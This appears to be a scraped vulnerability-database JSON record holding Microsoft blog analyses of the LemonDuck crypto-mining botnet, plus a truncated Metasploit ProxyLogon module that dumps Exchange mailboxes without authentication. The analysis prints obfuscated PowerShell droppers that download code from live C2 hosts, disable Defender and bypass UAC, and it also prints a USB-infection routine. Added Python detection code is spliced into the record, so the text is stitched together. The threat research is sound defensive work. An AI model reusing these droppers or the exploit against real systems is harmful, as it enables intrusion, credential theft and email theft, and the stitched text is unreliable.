[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAMWQuwrCYAyFzyz4DqWTgvgGDmK9gYigu5S22IK20op18OH9Erro4OAiIZc_OTknbaRMdxVKyDvVqrxqsDn9TKVu1H319FSgVjm9Gg-0ZlYwLRR7LHX6YFjQPVNvQVx8Z4IFCnUF1TpT44xnbEx-4OGPajPqCxYzS7VxjG3mdBodiaYygH9J_6YV-IY8BZ26irFYDDXCDZN0dd5hbTaE0y6s2PnHXWv432cHNvZs1J3-9_vtHfn_L9Gt0E952_Wxf90Lt1_r6hICAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"etc\",\"hosts\") \nor InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"IPAddressToString\",\"etc\",\"hosts\",\"DownloadData\")`\n\n \n\n[Learn how your organization can stop attacks through automated, cross-domain security and built-in AI with Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>).\n\n \n\nThe post [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T19:00:59", "type": "mssecure", "title": "When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-29T19:00:59", "id": "MSSECURE:4A6B394DCAF12E05136AE087248E228C", "href": "https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-30T00:08:30", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. Part 1 covers the evolution of the threat, how it spreads, and how it impacts organizations. [Part 2](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) is a deep dive on the attacker behavior and will provide investigation guidance.] _\n\nCombating and preventing today's threats to enterprises requires comprehensive protection focused on addressing the full scope and impact of attacks. Anything that can gain access to machines\u2014even so-called commodity malware\u2014can bring in more dangerous threats. We\u2019ve seen this in banking Trojans serving as entry points for ransomware and hands-on-keyboard attacks. LemonDuck, an actively updated and robust malware that\u2019s primarily known for its botnet and cryptocurrency mining objectives, followed the same trajectory when it adopted more sophisticated behavior and escalated its operations. 
Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck is also a threat to enterprises because it is cross-platform. It\u2019s one of a few documented bot malware families that target Linux systems as well as Windows devices. It uses a wide range of spreading mechanisms\u2014phishing emails, exploits, USB devices, brute force, among others\u2014and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using COVID-19-themed lures in email attacks. In 2021, it exploited newly patched [Exchange Server vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) to gain access to outdated systems.\n\nThis threat, however, does not limit itself to new or popular vulnerabilities. It continues to use older vulnerabilities, which benefit the attackers at times when focus shifts to patching a popular vulnerability rather than investigating compromise. Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and prevents any new infections by patching the same vulnerabilities it used to gain access.\n\nIn the early years, LemonDuck targeted China heavily, but its operations have since expanded to include many other countries, focusing on the manufacturing and IoT sectors. Today, LemonDuck impacts a very large geographic range, with the United States, Russia, China, Germany, the United Kingdom, India, Korea, Canada, France, and Vietnam seeing the most encounters.\n\n\n\n_Figure 1. 
Global distribution of LemonDuck botnet activity_\n\nIn 2021, LemonDuck campaigns started using more diversified command and control (C2) infrastructure and tools. This update supported the marked increase in hands-on-keyboard actions post-breach, which varied depending on the perceived value of compromised devices to the attackers. Despite all these upgrades, however, LemonDuck still utilizes C2s, functions, script structures, and variable names for far longer than the average malware. This is likely due to its use of bulletproof hosting providers such as Epik Holdings, which are unlikely to take any part of the LemonDuck infrastructure offline even when reported for malicious actions, allowing LemonDuck to persist and continue to be a threat.\n\nIn-depth research into malware infrastructures of various sizes and operations provides invaluable insight into the breadth of threats that organizations face today. In the case of LemonDuck, the threat is cross-platform, persistent, and constantly evolving. Research like this emphasizes the importance of having comprehensive visibility into the wide range of threats, as well as the ability to correlate simple, disparate activity such as coin mining to more dangerous adversarial attacks.\n\n## LemonDuck and LemonCat infrastructure\n\nThe earliest documentation of LemonDuck was from its cryptocurrency campaigns in May 2019. These campaigns included PowerShell scripts that employed additional scripts kicked off by a scheduled task. The task was used to bring in the PCASTLE tool to achieve a couple of goals: abuse the EternalBlue SMB exploit, as well as use brute force or pass-the-hash to move laterally and begin the operation again. Many of these behaviors are still observed in LemonDuck campaigns today.\n\nLemonDuck is named after the variable \u201cLemon_Duck\u201d in one of the said PowerShell scripts. The variable is often used as the user agent, in conjunction with assigned numbers, for infected devices. 
The format used two sets of alphabetical characters separated by dashes, for example: \u201cUser-Agent: Lemon-Duck-[A-Z]-[A-Z]\u201d. The term still appears in PowerShell scripts, as well as in many of the execution scripts, specifically in a function called SIEX, which is used to assign a unique user-agent during botnet connection in attacks as recently as June 2021.\n\nLemonDuck frequently utilizes open-source material built on resources also used by other botnets, so many components of this threat will seem familiar. Microsoft researchers are aware of two distinct operating structures, which both use the LemonDuck malware but are potentially operated by two different entities for separate goals.\n\nThe first, which we call the \u201cDuck\u201d infrastructure, uses the historical infrastructure discussed in this report. It is highly consistent in running campaigns and performs limited follow-on activities. This infrastructure is seldom seen in conjunction with edge device compromise as an infection method, is more likely to have random display names for its C2 sites, and is always observed utilizing \u201cLemon_Duck\u201d explicitly in script.\n\nThe second infrastructure, which we call \u201cCat\u201d infrastructure\u2014for primarily using two domains with the word \u201ccat\u201d in them (_sqlnetcat[.]com_, _netcatkit[.]com_)\u2014emerged in January 2021. It was used in attacks exploiting vulnerabilities in Microsoft Exchange Server. Today, the Cat infrastructure is used in attacks that typically result in backdoor installation, credential and data theft, and malware delivery. 
It is often seen delivering the malware Ramnit.\n\n**Sample Duck domains**\n\n * cdnimages[.]xyz\n * bb3u9[.]com\n * zz3r0[.]com\n * pp6r1[.]com\n * amynx[.]com\n * ackng[.]com\n * hwqloan[.]com\n * js88[.]ag\n * zer9g[.]com\n * b69kq[.]com\n\n**Sample Cat domains**\n\n * sqlnetcat[.]com\n * netcatkit[.]com\n * down[.]sqlnetcat[.]com\n\nThe Duck and Cat infrastructures use similar subdomains, and they use the same task names, such as \u201cblackball\u201d. Both infrastructures also utilize the same packaged components hosted on similar or identical sites for their mining, lateral movement, and competition-removal scripts, as well as many of the same function calls.\n\nThe fact that the Cat infrastructure is used for more dangerous campaigns does not deprioritize malware infections from the Duck infrastructure. Instead, this intelligence adds important context for understanding this threat: the same set of tools, access, and methods can be re-used at dynamic intervals, to greater impact. Despite the common assumption that cryptocurrency miners are less threatening than other malware, their core functionality mirrors that of other, non-monetized malware, making any botnet infection worthy of prioritization.\n\n\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## Initial access\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns.\n\nLemonDuck acts as a loader for many other follow-on activities, but one of its main functions is to spread by compromising other systems. 
Since its first appearance, the LemonDuck operators have leveraged scans against both Windows and Linux devices for open or weakly authenticated SMB, Exchange, SQL, Hadoop, REDIS, RDP, or other edge devices that might be vulnerable to password spray or application vulnerabilities like CVE-2017-0144 (EternalBlue), CVE-2017-8464 (LNK RCE), CVE-2019-0708 (BlueKeep), CVE-2020-0796 (SMBGhost), CVE-2021-26855 (ProxyLogon), CVE-2021-26857 (ProxyLogon), CVE-2021-26858 (ProxyLogon), and CVE-2021-27065 (ProxyLogon).\n\nOnce inside a system with an Outlook mailbox, as part of its normal exploitation behavior, LemonDuck attempts to run a script that utilizes the credentials present on the device. The script instructs the mailbox to send copies of a phishing message with preset messages and attachments to all contacts.\n\nBecause these messages come from a legitimate, already-compromised mailbox, security controls that rely on determining whether an email comes from a suspicious sender do not apply. This means that email security policies that reduce scanning or coverage for internal mail need to be re-evaluated, as sending emails through contact scraping is very effective at bypassing email controls.\n\nFrom mid-2020 to March 2021, LemonDuck\u2019s email subjects and body content have remained static, as have the attachment names and formats. 
These attachment names and formats have changed very little from similar campaigns that occurred in early 2020. The subjects and body text below are reproduced as sent, misspellings included, since they are the strings to hunt for.\n\n**Sample email subjects**\n\n * The Truth of COVID-19\n * COVID-19 nCov Special info WHO\n * HALTH ADVISORY:CORONA VIRUS\n * WTF\n * What the fcuk\n * good bye\n * farewell letter\n * broken file\n * This is your order?\n\n**Sample email body content**\n\n * Virus actually comes from United States of America\n * very important infomation for Covid-19\n * see attached document for your action and discretion.\n * the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.\n * what's wrong with you?are you out of your mind!!!!!\n * are you out of your mind!!!!!what 's wrong with you?\n * good bye, keep in touch\n * can you help me to fix the file,i can't read it\n * file is brokened, i can't open it\n\nThe attachment used for these lures is one of three types: .doc, .js, or a .zip containing a .js file. Whatever the type, the file is named \u201creadme\u201d. Occasionally, all three types are present in the same email.\n\n\n\n_Figure 3. Sample email_\n\nWhile the JavaScript is detected by many security vendors, it might be classified with generic detection names. Organizations may find it valuable to block or alert on JavaScript or VBScript launched directly from mail downloads that invokes interpreters such as PowerShell, through solutions such as [custom detection rules](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/custom-detection-rules?view=o365-worldwide>).\n\nSince LemonDuck began operating, the .zip to .js file execution method has been the most common. The JavaScript has replaced the scheduled task that LemonDuck previously used to kickstart the PowerShell script. This PowerShell script has looked very similar throughout 2020 and 2021, with minor changes depending on the version, indicating continued development. 
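Because the lure is sent from a real, already-compromised mailbox, sender reputation and internal-sender allow rules are the wrong place to catch it; the subject list and the "readme" attachment convention are what remain stable. The following Python is an added example, not code from the Microsoft post, that flags the lure on constructed sample messages using only those two signals and then shows how many of the hits an internal-sender exemption would have waved through. The `Mail` field names are an assumption for illustration, not the EmailEvents schema.

```python
from dataclasses import dataclass, field
from typing import List

# Lure subjects and the attachment convention as listed in the post above.
LURE_SUBJECTS = {s.lower() for s in (
    "The Truth of COVID-19", "COVID-19 nCov Special info WHO", "HALTH ADVISORY:CORONA VIRUS",
    "WTF", "What the fcuk", "good bye", "farewell letter", "broken file", "This is your order?")}
LURE_EXTENSIONS = (".doc", ".js", ".zip")


@dataclass
class Mail:
    """Minimal stand-in for an EmailEvents row; the field names are assumptions,
    not the real schema."""
    message_id: str
    sender: str
    subject: str
    attachments: List[str] = field(default_factory=list)


def is_lure_attachment(name: str) -> bool:
    """The dropper is always named 'readme' with a .doc, .js or .zip extension."""
    n = name.lower()
    return n.startswith("readme") and n.endswith(LURE_EXTENSIONS)


def is_lemonduck_lure(mail: Mail) -> bool:
    """Known subject plus at least one readme attachment. The sender is deliberately
    not consulted: LemonDuck mails from a real, already-compromised mailbox."""
    return (mail.subject.strip().lower() in LURE_SUBJECTS
            and any(is_lure_attachment(a) for a in mail.attachments))


def hunt_mail(events):
    """Message IDs that match the lure pattern, whatever the sender."""
    return [m.message_id for m in events if is_lemonduck_lure(m)]


def lures_from_internal_senders(events, internal_domain: str):
    """The subset that a 'skip scanning for internal senders' rule would have let through."""
    suffix = "@" + internal_domain.lower()
    return [m.message_id for m in events
            if is_lemonduck_lure(m) and m.sender.lower().endswith(suffix)]


# Constructed sample messages, not real mail.
SAMPLE_MAIL = [
    Mail("m1", "alice@corp.example", "farewell letter", ["readme.zip"]),   # compromised internal mailbox
    Mail("m2", "alice@corp.example", "good bye", []),                      # lure subject, no attachment
    Mail("m3", "vendor@partner.example", "This is your order?", ["readme.js"]),
    Mail("m4", "bob@corp.example", "Q3 report", ["report.doc"]),           # benign
    Mail("m5", "carol@corp.example", "WTF", ["README.DOC", "notes.txt"]),  # case differs, still a hit
]

if __name__ == "__main__":
    print("lures:", hunt_mail(SAMPLE_MAIL))
    print("from internal senders:", lures_from_internal_senders(SAMPLE_MAIL, "corp.example"))
```

On the constructed sample, m1, m3 and m5 are flagged and two of those three came from internal addresses, which is the case the post warns about: a policy that trusts internal mail would have delivered them. m2 is left alone because the post's query requires an attachment, which keeps a colleague's genuine "good bye" note out of the results.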
Below is a comparison of changes from the most recent iterations of the email-delivered downloads and those from April of 2020.\n\n \n\n**April 2020 PowerShell script** | **March 2021 PowerShell script** \n---|--- \n`var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden -c \\\"if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \\\\Microsoft\\\\Windows\\\\DiskCleanup\\\\SilentCleanup /I;Remove-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('http://t.awcna.com/7p.php');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Majo \n//This File is broken.` | `var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'z3r0.com/7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'z3r0.com/mail.jsp?js_0.7')\";cmd.run(cmdstr,0,1); \n//This File is broken.` \n \n \n\nAfter the emails are sent, the inbox is cleaned to remove traces of these mails. This method of self-spreading is attempted on any affected device that has a mailbox, regardless of whether it is an Exchange server.\n\nOther common methods of infection include movement within the compromised environment, as well as through USB and connected drives. 
These processes are often kicked off automatically and have occurred consistently throughout the entirety of LemonDuck\u2019s operation.\n\nThese methods run as a series of C# routines that enumerate the available drives for infection and keep a running list of drives already infected, decided by whether the implant\u2019s marker file is already present on the drive. A drive that is supported and not yet marked gets a hidden home directory created on it, populated with a set of hidden files that includes a copy of _readme.js_. Any device that has been affected by the LemonDuck implants at any time could have had any number of drives attached to it that were compromised in this manner, which makes this behavior a possible entry vector for additional attacks.\n\n`DriveInfo[] drives = DriveInfo.GetDrives(); \nforeach (DriveInfo drive in drives) \n{ \nif (blacklist.Contains(drive.Name)) \n{ continue;} \nConsole.WriteLine(\"Detect drive:\"+drive.Name); \nif (IsSupported(drive)) \n{ \nif (!File.Exists(drive + home + inf_data)) \n{ \nConsole.WriteLine(\"Try to infect \"+drive.Name); \nif (CreateHomeDirectory(drive.Name) && Infect(drive.Name)) \n{ \nblacklist.Add(drive.Name); \n} \n} \nelse { \nConsole.WriteLine(drive.Name+\" already infected!\"); \nblacklist.Add(drive.Name); \n} \n} \nelse{ \nblacklist.Add(drive.Name);`\n\nThe excerpt is truncated in the original post; `home`, `inf_data`, `IsSupported`, `CreateHomeDirectory`, and `Infect` are referenced but not shown. Note that the list is named _blacklist_ but receives unsupported drives, already-marked drives, and freshly infected ones alike, so it is simply the set of drives the loop will not touch again.\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Microsoft 365 Defender has AI-powered industry-leading protections that can stop multi-component threats like LemonDuck across domains and across platforms. Microsoft 365 Defender for Office 365 detects the malicious emails sent by the LemonDuck botnet to deliver malware payloads as well as spread the bot loader. 
Microsoft Defender for Endpoint detects and blocks LemonDuck implants, payloads, and malicious activity on Linux and Windows.\n\nMore importantly, Microsoft 365 Defender provides rich investigation tools that can expose detections of LemonDuck activity, including attempts to compromise and gain a foothold on the network, so security operations teams can efficiently and confidently respond to and resolve these attacks. Microsoft 365 Defender correlates cross-platform, cross-domain signals to paint the end-to-end attack chain, allowing organizations to see the full impact of an attack. We also published a threat analytics article on this threat. Microsoft 365 Defender customers can use this report to get important technical details, guidance for investigation, consolidated incidents, and steps to mitigate this threat in particular and modern cyberattacks in general.\n\nIn Part 2 of this blog series, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general, automatic behavior as well as human-initiated behavior. We will also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks. 
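The mail-delivered launch chain described above (readme.js run by the Windows Script Host, which starts a hidden PowerShell download cradle; the 2020 variant adds the Set-MpPreference tamper and the windir/SilentCleanup scheduled-task trick, a known UAC bypass) is the natural target for the custom detection rule suggested earlier. The Python below is an added example, not code from the Microsoft post or from LemonDuck: it runs that check over constructed process-creation events whose field names (id, image, ancestors, cmdline) are an assumption to be mapped onto Sysmon event 1 or Defender DeviceProcessEvents, and its two quoted command lines are cut down from the scripts in the table above. The step the prose does not spell out is normalization: the March 2021 script hides IEX and New-Object behind PowerShell backtick escapes, so the matcher strips backticks before looking for keywords, and a script-host parent on its own (a logon script, say) is deliberately not enough to fire.

```python
import re

# Process images the post identifies as the lure's first stage: the readme.js
# attachment (or the .js inside readme.zip) is executed by the Windows Script Host.
SCRIPT_HOSTS = {'wscript.exe', 'cscript.exe'}

# Traits of the April 2020 and March 2021 PowerShell stages quoted in the post.
# Patterns run against the de-obfuscated, lower-cased command line.
INDICATORS = {
    # -w hidden / -WindowStyle hidden
    'hidden_window': re.compile(r'-w(?:indowstyle)?[ ]+hidden'),
    # IEX(New-Object Net.WebClient).DownloadString(...) download cradle
    'download_cradle': re.compile(r'(?:iex|invoke-expression)[ (].*download(?:string|file)[(]'),
    # Set-MpPreference -DisableRealtimeMonitoring 1 (Defender tamper)
    'defender_tamper': re.compile(r'set-mppreference[ ]+-disablerealtimemonitoring'),
    # HKCU:\Environment windir value plus the SilentCleanup task (UAC bypass, 2020 script)
    'silentcleanup_uac_bypass': re.compile(r'hkcu:.environment.*windir.*silentcleanup'),
}


def normalize(cmdline):
    # PowerShell treats a backtick as an escape character, so IE`x(Ne`w-Obj`ect ...)
    # runs exactly like IEx(New-Object ...). Dropping every backtick before matching
    # defeats that trick; losing genuine escapes such as `n does not matter here.
    return cmdline.replace('`', '').lower()


def classify(event):
    # event: one process-creation record (assumed field names). 'ancestors' is the
    # parent chain, nearest first, as image basenames.
    cmd = normalize(event['cmdline'])
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    from_script_host = any(a.lower() in SCRIPT_HOSTS for a in event['ancestors'])
    if from_script_host and 'download_cradle' in hits:
        verdict = 'lemonduck_mail_chain'
    elif len(hits) >= 2:
        verdict = 'suspicious_powershell'
    else:
        verdict = 'benign'
    return verdict, hits


def scan(events):
    # Return (id, verdict, hits) for every event that is not benign.
    out = []
    for ev in events:
        verdict, hits = classify(ev)
        if verdict != 'benign':
            out.append((ev['id'], verdict, hits))
    return out


# Constructed sample events. Command lines 1 and 2 are shortened from the two
# scripts quoted in the post; 3 to 5 are made up for the false-positive cases.
SAMPLE_EVENTS = [
    {'id': 1, 'image': 'powershell.exe', 'ancestors': ['cmd.exe', 'wscript.exe'],
     'cmdline': '''powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'z3r0.com/7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'z3r0.com/mail.jsp?js_0.7')'''},
    {'id': 2, 'image': 'powershell.exe', 'ancestors': ['cmd.exe', 'wscript.exe'],
     'cmdline': '''powershell -w hidden -c if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp'') &::';sleep 1;schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('http://t.awcna.com/7p.php')}'''},
    {'id': 3, 'image': 'powershell.exe', 'ancestors': ['explorer.exe'],
     'cmdline': 'powershell.exe -NoProfile -Command Get-Process | Sort-Object CPU'},
    # Logon script run by the script host: ancestry alone must not trigger.
    {'id': 4, 'image': 'powershell.exe', 'ancestors': ['wscript.exe', 'userinit.exe'],
     'cmdline': 'powershell.exe -ExecutionPolicy Bypass -File \\\\fileserver\\netlogon\\map-drives.ps1'},
    # Hidden download cradle without a script-host parent: worth a look, not the mail chain.
    {'id': 5, 'image': 'powershell.exe', 'ancestors': ['cmd.exe', 'explorer.exe'],
     'cmdline': '''powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')'''},
]

if __name__ == '__main__':
    for event_id, verdict, hits in scan(SAMPLE_EVENTS):
        print(event_id, verdict, ', '.join(hits))
```

Expressed as a Defender custom detection, the same logic is a DeviceProcessEvents query on the initiating process being wscript.exe or cscript.exe and the command line, after removing backticks, containing both an IEX/Invoke-Expression and a DownloadString/DownloadFile call; the extra indicators are what separate a noisy generic hit from the LemonDuck chain.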
**READ: [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>).**\n\n \n\n_Microsoft 365 Defender Threat Intelligence Team_\n\nThe post [When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-22T16:00:57", "type": "mssecure", "title": "When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-22T16:00:57", "id": 
"MSSECURE:E537BA51663A720821A67D2A4F7F7F0E", "href": "https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-05-21T16:03:52", "description": "", "cvss3": {}, "published": "2021-05-21T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange ProxyLogon Collector", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-05-21T00:00:00", "id": "PACKETSTORM:162736", "href": "https://packetstormsecurity.com/files/162736/Microsoft-Exchange-ProxyLogon-Collector.html", "sourceData": "`# Exploit Title: Microsoft Exchange 2019 - Unauthenticated Email Download (Metasploit) \n# Date: 2021-03-02 \n# Exploit Author: RAMELLA S\u00e9bastien \n# Vendor Homepage: https://microsoft.com \n# Version: This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, \nExchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, \nExchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010). \n# Tested on: Microsoft Windows 2012 R2 - Exchange 2016 \n \n## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \n# begin auxiliary class \nclass MetasploitModule < Msf::Auxiliary \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft Exchange ProxyLogon Collector', \n'Description' => %q{ \nThis module scan for a vulnerability on Microsoft Exchange Server that \nallows an attacker bypassing the authentication and impersonating as the \nadmin (CVE-2021-26855). \n \nBy chaining this bug with another post-auth arbitrary-file-write \nvulnerability to get code execution (CVE-2021-27065). 
\n \nAs a result, an unauthenticated attacker can execute arbitrary commands on \nMicrosoft Exchange Server. \n \nThis vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, \nExchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, \nExchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010). \n \nAll components are vulnerable by default. \n}, \n'Author' => [ \n'mekhalleh (RAMELLA S\u00e9bastien)' # Module author (Zeop Entreprise) \n], \n'References' => [ \n['CVE', '2021-26855'], \n['LOGO', 'https://proxylogon.com/images/logo.jpg'], \n['URL', 'https://proxylogon.com/'], \n['URL', 'https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse'], \n['URL', 'http://aka.ms/exchangevulns'] \n], \n'DisclosureDate' => '2021-03-02', \n'License' => MSF_LICENSE, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Notes' => { \n'AKA' => ['ProxyLogon'] \n} \n) \n) \n \nregister_options([ \nOptString.new('EMAIL', [true, 'The email account what you want dump']), \nOptString.new('FOLDER', [true, 'The email folder what you want dump', 'inbox']), \nOptString.new('SERVER_NAME', [true, 'The name of secondary internal Exchange server targeted']) \n]) \n \nregister_advanced_options([ \nOptInt.new('MaxEntries', [false, 'Override the maximum number of object to dump', 512]) \n]) \nend \n \nXMLNS = { 't' => 'http://schemas.microsoft.com/exchange/services/2006/types' }.freeze \n \ndef grab_contacts \nresponse = send_xml(soap_findcontacts) \nxml = Nokogiri::XML.parse(response.body) \n \ndata = xml.xpath('//t:Contact', XMLNS) \nif data.empty? \nprint_status(' - the user has no contacts') \nelse \nwrite_loot(data.to_s) \nend \nend \n \ndef grab_emails(total_count) \n# get the emails list of the target folder. \nresponse = send_xml(soap_maillist(total_count)) \nxml = Nokogiri::XML.parse(response.body) \n \n# iteration to download the emails. 
